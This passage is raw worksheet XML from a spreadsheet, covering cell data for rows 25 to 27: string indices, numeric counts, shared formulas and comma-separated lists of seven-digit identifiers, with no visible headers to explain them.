      <c r="HK25" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL25" s="93">
        <v>1.0</v>
      </c>
      <c r="HM25" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN25" s="93">
        <v>0.0</v>
      </c>
      <c r="HO25" s="93">
        <v>0.0</v>
      </c>
      <c r="HP25" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ25" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR25" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS25" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT25" s="139" t="s">
        <v>632</v>
      </c>
      <c r="HU25" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV25" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW25" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX25" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY25" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ25" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA25" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB25" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC25" s="120" t="str">
        <f t="shared" si="84"/>
        <v>-</v>
      </c>
      <c r="ID25" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE25" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF25" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG25" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH25" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II25" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ25" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK25" s="99">
        <v>2.0</v>
      </c>
      <c r="IL25" s="99">
        <v>0.0</v>
      </c>
      <c r="IM25" s="121">
        <f t="shared" si="57"/>
        <v>1</v>
      </c>
      <c r="IN25" s="122" t="s">
        <v>444</v>
      </c>
      <c r="IO25" s="98">
        <v>1.0</v>
      </c>
      <c r="IP25" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ25" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR25" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS25" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT25" s="127"/>
      <c r="IU25" s="127"/>
      <c r="IV25" s="127"/>
      <c r="IW25" s="127"/>
      <c r="IX25" s="127"/>
      <c r="IY25" s="127"/>
      <c r="IZ25" s="127"/>
      <c r="JA25" s="127"/>
      <c r="JB25" s="127"/>
      <c r="JC25" s="127"/>
      <c r="JD25" s="127"/>
      <c r="JE25" s="127"/>
      <c r="JF25" s="127"/>
      <c r="JG25" s="127"/>
      <c r="JH25" s="127"/>
      <c r="JI25" s="127"/>
      <c r="JJ25" s="127"/>
      <c r="JK25" s="127"/>
      <c r="JL25" s="127"/>
      <c r="JM25" s="127"/>
      <c r="JN25" s="127"/>
      <c r="JO25" s="127"/>
      <c r="JP25" s="127"/>
      <c r="JQ25" s="127"/>
      <c r="JR25" s="127"/>
      <c r="JS25" s="127"/>
      <c r="JT25" s="127"/>
      <c r="JU25" s="127"/>
      <c r="JV25" s="127"/>
      <c r="JW25" s="127"/>
      <c r="JX25" s="127"/>
      <c r="JY25" s="127"/>
      <c r="JZ25" s="127"/>
      <c r="KA25" s="127"/>
      <c r="KB25" s="127"/>
      <c r="KC25" s="127"/>
      <c r="KD25" s="127"/>
      <c r="KE25" s="127"/>
      <c r="KF25" s="127"/>
      <c r="KG25" s="127"/>
      <c r="KH25" s="127"/>
      <c r="KI25" s="127"/>
      <c r="KJ25" s="127"/>
      <c r="KK25" s="127"/>
      <c r="KL25" s="127"/>
      <c r="KM25" s="127"/>
      <c r="KN25" s="127"/>
      <c r="KO25" s="127"/>
      <c r="KP25" s="127"/>
      <c r="KQ25" s="127"/>
      <c r="KR25" s="127"/>
      <c r="KS25" s="127"/>
      <c r="KT25" s="127"/>
      <c r="KU25" s="127"/>
      <c r="KV25" s="127"/>
      <c r="KW25" s="127"/>
      <c r="KX25" s="127"/>
      <c r="KY25" s="127"/>
      <c r="KZ25" s="127"/>
      <c r="LA25" s="127"/>
      <c r="LB25" s="127"/>
      <c r="LC25" s="127"/>
      <c r="LD25" s="127"/>
      <c r="LE25" s="127"/>
      <c r="LF25" s="127"/>
      <c r="LG25" s="127"/>
      <c r="LH25" s="127"/>
      <c r="LI25" s="127"/>
      <c r="LJ25" s="127"/>
      <c r="LK25" s="127"/>
      <c r="LL25" s="127"/>
      <c r="LM25" s="127"/>
      <c r="LN25" s="127"/>
      <c r="LO25" s="127"/>
      <c r="LP25" s="127"/>
      <c r="LQ25" s="127"/>
      <c r="LR25" s="127"/>
      <c r="LS25" s="127"/>
      <c r="LT25" s="127"/>
      <c r="LU25" s="127"/>
      <c r="LV25" s="127"/>
      <c r="LW25" s="127"/>
      <c r="LX25" s="127"/>
      <c r="LY25" s="127"/>
      <c r="LZ25" s="127"/>
      <c r="MA25" s="127"/>
      <c r="MB25" s="127"/>
      <c r="MC25" s="127"/>
      <c r="MD25" s="127"/>
      <c r="ME25" s="127"/>
      <c r="MF25" s="127"/>
      <c r="MG25" s="127"/>
      <c r="MH25" s="127"/>
      <c r="MI25" s="127"/>
      <c r="MJ25" s="127"/>
      <c r="MK25" s="127"/>
      <c r="ML25" s="127"/>
      <c r="MM25" s="127"/>
      <c r="MN25" s="127"/>
      <c r="MO25" s="127"/>
      <c r="MP25" s="127"/>
      <c r="MQ25" s="127"/>
      <c r="MR25" s="127"/>
      <c r="MS25" s="127"/>
      <c r="MT25" s="127"/>
      <c r="MU25" s="127"/>
      <c r="MV25" s="127"/>
      <c r="MW25" s="127"/>
      <c r="MX25" s="127"/>
      <c r="MY25" s="127"/>
      <c r="MZ25" s="127"/>
      <c r="NA25" s="127"/>
      <c r="NB25" s="127"/>
      <c r="NC25" s="127"/>
      <c r="ND25" s="127"/>
      <c r="NE25" s="127"/>
      <c r="NF25" s="127"/>
      <c r="NG25" s="127"/>
      <c r="NH25" s="127"/>
      <c r="NI25" s="127"/>
      <c r="NJ25" s="127"/>
      <c r="NK25" s="127"/>
      <c r="NL25" s="127"/>
      <c r="NM25" s="127"/>
      <c r="NN25" s="127"/>
      <c r="NO25" s="127"/>
      <c r="NP25" s="127"/>
      <c r="NQ25" s="127"/>
      <c r="NR25" s="127"/>
      <c r="NS25" s="127"/>
      <c r="NT25" s="127"/>
      <c r="NU25" s="127"/>
      <c r="NV25" s="127"/>
      <c r="NW25" s="127"/>
      <c r="NX25" s="127"/>
      <c r="NY25" s="127"/>
    </row>
    <row r="26" ht="153.75" customHeight="1">
      <c r="B26" s="89" t="s">
        <v>633</v>
      </c>
      <c r="C26" s="90" t="s">
        <v>634</v>
      </c>
      <c r="D26" s="90" t="s">
        <v>635</v>
      </c>
      <c r="E26" s="90" t="s">
        <v>636</v>
      </c>
      <c r="F26" s="90" t="s">
        <v>637</v>
      </c>
      <c r="G26" s="90" t="s">
        <v>638</v>
      </c>
      <c r="H26" s="90" t="s">
        <v>639</v>
      </c>
      <c r="I26" s="92" t="s">
        <v>640</v>
      </c>
      <c r="J26" s="92" t="s">
        <v>641</v>
      </c>
      <c r="K26" s="92" t="s">
        <v>642</v>
      </c>
      <c r="L26" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M26" s="93">
        <v>2.0</v>
      </c>
      <c r="N26" s="93">
        <v>1.0</v>
      </c>
      <c r="O26" s="93">
        <v>1.0</v>
      </c>
      <c r="P26" s="93">
        <v>1.0</v>
      </c>
      <c r="Q26" s="93">
        <f t="shared" si="70"/>
        <v>2</v>
      </c>
      <c r="R26" s="93">
        <v>1.0</v>
      </c>
      <c r="S26" s="93">
        <v>1.0</v>
      </c>
      <c r="T26" s="94" t="s">
        <v>643</v>
      </c>
      <c r="U26" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V26" s="126" t="s">
        <v>644</v>
      </c>
      <c r="W26" s="126" t="s">
        <v>645</v>
      </c>
      <c r="X26" s="132" t="s">
        <v>646</v>
      </c>
      <c r="Y26" s="126" t="s">
        <v>647</v>
      </c>
      <c r="Z26" s="126" t="s">
        <v>648</v>
      </c>
      <c r="AA26" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB26" s="98" t="s">
        <v>224</v>
      </c>
      <c r="AC26" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AD26" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE26" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF26" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG26" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH26" s="99" t="s">
        <v>649</v>
      </c>
      <c r="AI26" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ26" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK26" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL26" s="100">
        <v>0.0</v>
      </c>
      <c r="AM26" s="100">
        <v>0.0</v>
      </c>
      <c r="AN26" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO26" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP26" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ26" s="100">
        <v>0.0</v>
      </c>
      <c r="AR26" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS26" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT26" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU26" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV26" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW26" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX26" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY26" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ26" s="100">
        <v>0.0</v>
      </c>
      <c r="BA26" s="102">
        <v>2.0</v>
      </c>
      <c r="BB26" s="102">
        <v>0.0</v>
      </c>
      <c r="BC26" s="102">
        <v>0.0</v>
      </c>
      <c r="BD26" s="102">
        <v>0.0</v>
      </c>
      <c r="BE26" s="102">
        <v>0.0</v>
      </c>
      <c r="BF26" s="102">
        <v>0.0</v>
      </c>
      <c r="BG26" s="102">
        <v>0.0</v>
      </c>
      <c r="BH26" s="102">
        <v>0.0</v>
      </c>
      <c r="BI26" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ26" s="102">
        <v>0.0</v>
      </c>
      <c r="BK26" s="102">
        <v>0.0</v>
      </c>
      <c r="BL26" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM26" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN26" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO26" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP26" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ26" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR26" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS26" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT26" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU26" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV26" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW26" s="104" t="s">
        <v>650</v>
      </c>
      <c r="BX26" s="104">
        <v>4.0</v>
      </c>
      <c r="BY26" s="104">
        <v>14.0</v>
      </c>
      <c r="BZ26" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA26" s="104" t="s">
        <v>650</v>
      </c>
      <c r="CB26" s="104">
        <v>4.0</v>
      </c>
      <c r="CC26" s="104">
        <v>14.0</v>
      </c>
      <c r="CD26" s="104" t="s">
        <v>651</v>
      </c>
      <c r="CE26" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF26" s="104" t="str">
        <f t="shared" si="73"/>
        <v>2034567, 2013028, 2019240</v>
      </c>
      <c r="CG26" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH26" s="104" t="s">
        <v>651</v>
      </c>
      <c r="CI26" s="104">
        <v>2043217.0</v>
      </c>
      <c r="CJ26" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK26" s="104">
        <v>1.0</v>
      </c>
      <c r="CL26" s="104">
        <v>11.0</v>
      </c>
      <c r="CM26" s="105">
        <v>2.0</v>
      </c>
      <c r="CN26" s="105">
        <v>0.0</v>
      </c>
      <c r="CO26" s="105">
        <v>13.0</v>
      </c>
      <c r="CP26" s="105">
        <v>14.0</v>
      </c>
      <c r="CQ26" s="105">
        <v>14.0</v>
      </c>
      <c r="CR26" s="105">
        <v>28.0</v>
      </c>
      <c r="CS26" s="105">
        <v>0.0</v>
      </c>
      <c r="CT26" s="105">
        <v>0.0</v>
      </c>
      <c r="CU26" s="105">
        <v>0.0</v>
      </c>
      <c r="CV26" s="105">
        <v>0.0</v>
      </c>
      <c r="CW26" s="105">
        <v>0.0</v>
      </c>
      <c r="CX26" s="105">
        <v>13.0</v>
      </c>
      <c r="CY26" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ26" s="105">
        <v>14.0</v>
      </c>
      <c r="DA26" s="105">
        <v>14.0</v>
      </c>
      <c r="DB26" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC26" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD26" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE26" s="106">
        <f t="shared" si="18"/>
        <v>13</v>
      </c>
      <c r="DF26" s="106">
        <f t="shared" si="19"/>
        <v>13</v>
      </c>
      <c r="DG26" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH26" s="106">
        <f t="shared" si="21"/>
        <v>28</v>
      </c>
      <c r="DI26" s="106">
        <f t="shared" si="22"/>
        <v>14</v>
      </c>
      <c r="DJ26" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK26" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL26" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM26" s="108" t="s">
        <v>652</v>
      </c>
      <c r="DN26" s="108">
        <v>5.0</v>
      </c>
      <c r="DO26" s="108">
        <v>26.0</v>
      </c>
      <c r="DP26" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ26" s="108" t="s">
        <v>652</v>
      </c>
      <c r="DR26" s="108">
        <v>5.0</v>
      </c>
      <c r="DS26" s="108">
        <v>26.0</v>
      </c>
      <c r="DT26" s="108" t="s">
        <v>653</v>
      </c>
      <c r="DU26" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV26" s="108" t="str">
        <f t="shared" si="85"/>
        <v>50447, 2034567, 2013028, 2019240</v>
      </c>
      <c r="DW26" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX26" s="108" t="s">
        <v>653</v>
      </c>
      <c r="DY26" s="108">
        <v>2043217.0</v>
      </c>
      <c r="DZ26" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA26" s="108">
        <v>1.0</v>
      </c>
      <c r="EB26" s="108">
        <v>11.0</v>
      </c>
      <c r="EC26" s="109">
        <v>2.0</v>
      </c>
      <c r="ED26" s="109">
        <v>0.0</v>
      </c>
      <c r="EE26" s="109">
        <v>14.0</v>
      </c>
      <c r="EF26" s="109">
        <v>12.0</v>
      </c>
      <c r="EG26" s="109">
        <v>14.0</v>
      </c>
      <c r="EH26" s="109">
        <v>26.0</v>
      </c>
      <c r="EI26" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ26" s="109">
        <v>0.0</v>
      </c>
      <c r="EK26" s="109">
        <v>0.0</v>
      </c>
      <c r="EL26" s="109">
        <v>0.0</v>
      </c>
      <c r="EM26" s="109">
        <v>0.0</v>
      </c>
      <c r="EN26" s="109">
        <v>14.0</v>
      </c>
      <c r="EO26" s="109">
        <v>12.0</v>
      </c>
      <c r="EP26" s="109">
        <v>14.0</v>
      </c>
      <c r="EQ26" s="109">
        <v>26.0</v>
      </c>
      <c r="ER26" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES26" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET26" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU26" s="110">
        <f t="shared" si="30"/>
        <v>14</v>
      </c>
      <c r="EV26" s="110">
        <f t="shared" si="31"/>
        <v>14</v>
      </c>
      <c r="EW26" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX26" s="110">
        <f t="shared" si="33"/>
        <v>26</v>
      </c>
      <c r="EY26" s="110">
        <f t="shared" si="34"/>
        <v>26</v>
      </c>
      <c r="EZ26" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA26" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB26" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC26" s="111" t="s">
        <v>654</v>
      </c>
      <c r="FD26" s="111">
        <v>12.0</v>
      </c>
      <c r="FE26" s="111">
        <v>52.0</v>
      </c>
      <c r="FF26" s="101" t="s">
        <v>655</v>
      </c>
      <c r="FG26" s="111" t="s">
        <v>656</v>
      </c>
      <c r="FH26" s="111">
        <v>9.0</v>
      </c>
      <c r="FI26" s="111">
        <v>42.0</v>
      </c>
      <c r="FJ26" s="111" t="s">
        <v>657</v>
      </c>
      <c r="FK26" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL26" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002752, 2002749. 2034567, 2013028, 2019240, 50447, 2002824, 2101200, 2006409, 2101390, 2011803</v>
      </c>
      <c r="FM26" s="111" t="s">
        <v>658</v>
      </c>
      <c r="FN26" s="111" t="s">
        <v>659</v>
      </c>
      <c r="FO26" s="111">
        <v>2043217.0</v>
      </c>
      <c r="FP26" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ26" s="111">
        <v>1.0</v>
      </c>
      <c r="FR26" s="111">
        <v>10.0</v>
      </c>
      <c r="FS26" s="112">
        <v>2.0</v>
      </c>
      <c r="FT26" s="112">
        <v>2.0</v>
      </c>
      <c r="FU26" s="112">
        <v>35.0</v>
      </c>
      <c r="FV26" s="112">
        <v>12.0</v>
      </c>
      <c r="FW26" s="112">
        <v>40.0</v>
      </c>
      <c r="FX26" s="112">
        <v>52.0</v>
      </c>
      <c r="FY26" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ26" s="112">
        <v>0.0</v>
      </c>
      <c r="GA26" s="112">
        <v>0.0</v>
      </c>
      <c r="GB26" s="112">
        <v>0.0</v>
      </c>
      <c r="GC26" s="112">
        <v>0.0</v>
      </c>
      <c r="GD26" s="112">
        <v>29.0</v>
      </c>
      <c r="GE26" s="112">
        <v>12.0</v>
      </c>
      <c r="GF26" s="112">
        <v>30.0</v>
      </c>
      <c r="GG26" s="112">
        <v>42.0</v>
      </c>
      <c r="GH26" s="113">
        <f t="shared" si="39"/>
        <v>2</v>
      </c>
      <c r="GI26" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ26" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK26" s="113">
        <f t="shared" si="42"/>
        <v>35</v>
      </c>
      <c r="GL26" s="113">
        <f t="shared" si="43"/>
        <v>29</v>
      </c>
      <c r="GM26" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN26" s="113">
        <f t="shared" si="45"/>
        <v>52</v>
      </c>
      <c r="GO26" s="113">
        <f t="shared" si="46"/>
        <v>42</v>
      </c>
      <c r="GP26" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ26" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR26" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS26" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT26" s="94" t="s">
        <v>660</v>
      </c>
      <c r="GU26" s="130">
        <v>52676.0</v>
      </c>
      <c r="GV26" s="116">
        <v>1.0</v>
      </c>
      <c r="GW26" s="116">
        <v>2.0</v>
      </c>
      <c r="GX26" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY26" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ26" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA26" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB26" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC26" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD26" s="131">
        <v>52676.0</v>
      </c>
      <c r="HE26" s="131">
        <v>52676.0</v>
      </c>
      <c r="HF26" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG26" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH26" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI26" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ26" s="93" t="s">
        <v>661</v>
      </c>
      <c r="HK26" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL26" s="93">
        <v>2.0</v>
      </c>
      <c r="HM26" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN26" s="93">
        <v>0.0</v>
      </c>
      <c r="HO26" s="93">
        <v>0.0</v>
      </c>
      <c r="HP26" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ26" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR26" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS26" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT26" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU26" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV26" s="145" t="s">
        <v>662</v>
      </c>
      <c r="HW26" s="119">
        <v>2.0</v>
      </c>
      <c r="HX26" s="119">
        <v>20.0</v>
      </c>
      <c r="HY26" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ26" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA26" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB26" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC26" s="120">
        <v>86782.0</v>
      </c>
      <c r="ID26" s="120" t="s">
        <v>662</v>
      </c>
      <c r="IE26" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF26" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG26" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH26" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II26" s="99" t="s">
        <v>663</v>
      </c>
      <c r="IJ26" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK26" s="99">
        <v>2.0</v>
      </c>
      <c r="IL26" s="99">
        <v>0.0</v>
      </c>
      <c r="IM26" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN26" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO26" s="98">
        <v>2.0</v>
      </c>
      <c r="IP26" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ26" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR26" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS26" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT26" s="127"/>
      <c r="IU26" s="127"/>
      <c r="IV26" s="127"/>
      <c r="IW26" s="127"/>
      <c r="IX26" s="127"/>
      <c r="IY26" s="127"/>
      <c r="IZ26" s="127"/>
      <c r="JA26" s="127"/>
      <c r="JB26" s="127"/>
      <c r="JC26" s="127"/>
      <c r="JD26" s="127"/>
      <c r="JE26" s="127"/>
      <c r="JF26" s="127"/>
      <c r="JG26" s="127"/>
      <c r="JH26" s="127"/>
      <c r="JI26" s="127"/>
      <c r="JJ26" s="127"/>
      <c r="JK26" s="127"/>
      <c r="JL26" s="127"/>
      <c r="JM26" s="127"/>
      <c r="JN26" s="127"/>
      <c r="JO26" s="127"/>
      <c r="JP26" s="127"/>
      <c r="JQ26" s="127"/>
      <c r="JR26" s="127"/>
      <c r="JS26" s="127"/>
      <c r="JT26" s="127"/>
      <c r="JU26" s="127"/>
      <c r="JV26" s="127"/>
      <c r="JW26" s="127"/>
      <c r="JX26" s="127"/>
      <c r="JY26" s="127"/>
      <c r="JZ26" s="127"/>
      <c r="KA26" s="127"/>
      <c r="KB26" s="127"/>
      <c r="KC26" s="127"/>
      <c r="KD26" s="127"/>
      <c r="KE26" s="127"/>
      <c r="KF26" s="127"/>
      <c r="KG26" s="127"/>
      <c r="KH26" s="127"/>
      <c r="KI26" s="127"/>
      <c r="KJ26" s="127"/>
      <c r="KK26" s="127"/>
      <c r="KL26" s="127"/>
      <c r="KM26" s="127"/>
      <c r="KN26" s="127"/>
      <c r="KO26" s="127"/>
      <c r="KP26" s="127"/>
      <c r="KQ26" s="127"/>
      <c r="KR26" s="127"/>
      <c r="KS26" s="127"/>
      <c r="KT26" s="127"/>
      <c r="KU26" s="127"/>
      <c r="KV26" s="127"/>
      <c r="KW26" s="127"/>
      <c r="KX26" s="127"/>
      <c r="KY26" s="127"/>
      <c r="KZ26" s="127"/>
      <c r="LA26" s="127"/>
      <c r="LB26" s="127"/>
      <c r="LC26" s="127"/>
      <c r="LD26" s="127"/>
      <c r="LE26" s="127"/>
      <c r="LF26" s="127"/>
      <c r="LG26" s="127"/>
      <c r="LH26" s="127"/>
      <c r="LI26" s="127"/>
      <c r="LJ26" s="127"/>
      <c r="LK26" s="127"/>
      <c r="LL26" s="127"/>
      <c r="LM26" s="127"/>
      <c r="LN26" s="127"/>
      <c r="LO26" s="127"/>
      <c r="LP26" s="127"/>
      <c r="LQ26" s="127"/>
      <c r="LR26" s="127"/>
      <c r="LS26" s="127"/>
      <c r="LT26" s="127"/>
      <c r="LU26" s="127"/>
      <c r="LV26" s="127"/>
      <c r="LW26" s="127"/>
      <c r="LX26" s="127"/>
      <c r="LY26" s="127"/>
      <c r="LZ26" s="127"/>
      <c r="MA26" s="127"/>
      <c r="MB26" s="127"/>
      <c r="MC26" s="127"/>
      <c r="MD26" s="127"/>
      <c r="ME26" s="127"/>
      <c r="MF26" s="127"/>
      <c r="MG26" s="127"/>
      <c r="MH26" s="127"/>
      <c r="MI26" s="127"/>
      <c r="MJ26" s="127"/>
      <c r="MK26" s="127"/>
      <c r="ML26" s="127"/>
      <c r="MM26" s="127"/>
      <c r="MN26" s="127"/>
      <c r="MO26" s="127"/>
      <c r="MP26" s="127"/>
      <c r="MQ26" s="127"/>
      <c r="MR26" s="127"/>
      <c r="MS26" s="127"/>
      <c r="MT26" s="127"/>
      <c r="MU26" s="127"/>
      <c r="MV26" s="127"/>
      <c r="MW26" s="127"/>
      <c r="MX26" s="127"/>
      <c r="MY26" s="127"/>
      <c r="MZ26" s="127"/>
      <c r="NA26" s="127"/>
      <c r="NB26" s="127"/>
      <c r="NC26" s="127"/>
      <c r="ND26" s="127"/>
      <c r="NE26" s="127"/>
      <c r="NF26" s="127"/>
      <c r="NG26" s="127"/>
      <c r="NH26" s="127"/>
      <c r="NI26" s="127"/>
      <c r="NJ26" s="127"/>
      <c r="NK26" s="127"/>
      <c r="NL26" s="127"/>
      <c r="NM26" s="127"/>
      <c r="NN26" s="127"/>
      <c r="NO26" s="127"/>
      <c r="NP26" s="127"/>
      <c r="NQ26" s="127"/>
      <c r="NR26" s="127"/>
      <c r="NS26" s="127"/>
      <c r="NT26" s="127"/>
      <c r="NU26" s="127"/>
      <c r="NV26" s="127"/>
      <c r="NW26" s="127"/>
      <c r="NX26" s="127"/>
      <c r="NY26" s="127"/>
    </row>
    <row r="27" ht="198.0" customHeight="1">
      <c r="B27" s="146" t="s">
        <v>664</v>
      </c>
      <c r="C27" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D27" s="90" t="s">
        <v>665</v>
      </c>
      <c r="E27" s="90" t="s">
        <v>666</v>
      </c>
      <c r="F27" s="90" t="s">
        <v>667</v>
      </c>
      <c r="G27" s="90" t="s">
        <v>668</v>
      </c>
      <c r="H27" s="90" t="s">
        <v>669</v>
      </c>
      <c r="I27" s="92" t="s">
        <v>670</v>
      </c>
      <c r="J27" s="92" t="s">
        <v>432</v>
      </c>
      <c r="K27" s="92" t="s">
        <v>671</v>
      </c>
      <c r="L27" s="93" t="s">
        <v>267</v>
      </c>
      <c r="M27" s="93">
        <v>1.0</v>
      </c>
      <c r="N27" s="93">
        <v>1.0</v>
      </c>
      <c r="O27" s="93">
        <v>0.0</v>
      </c>
      <c r="P27" s="93">
        <v>1.0</v>
      </c>
      <c r="Q27" s="93">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="R27" s="93">
        <v>1.0</v>
      </c>
      <c r="S27" s="93">
        <v>0.0</v>
      </c>
      <c r="T27" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U27" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V27" s="96" t="s">
        <v>672</v>
      </c>
      <c r="W27" s="96" t="s">
        <v>12</v>
      </c>
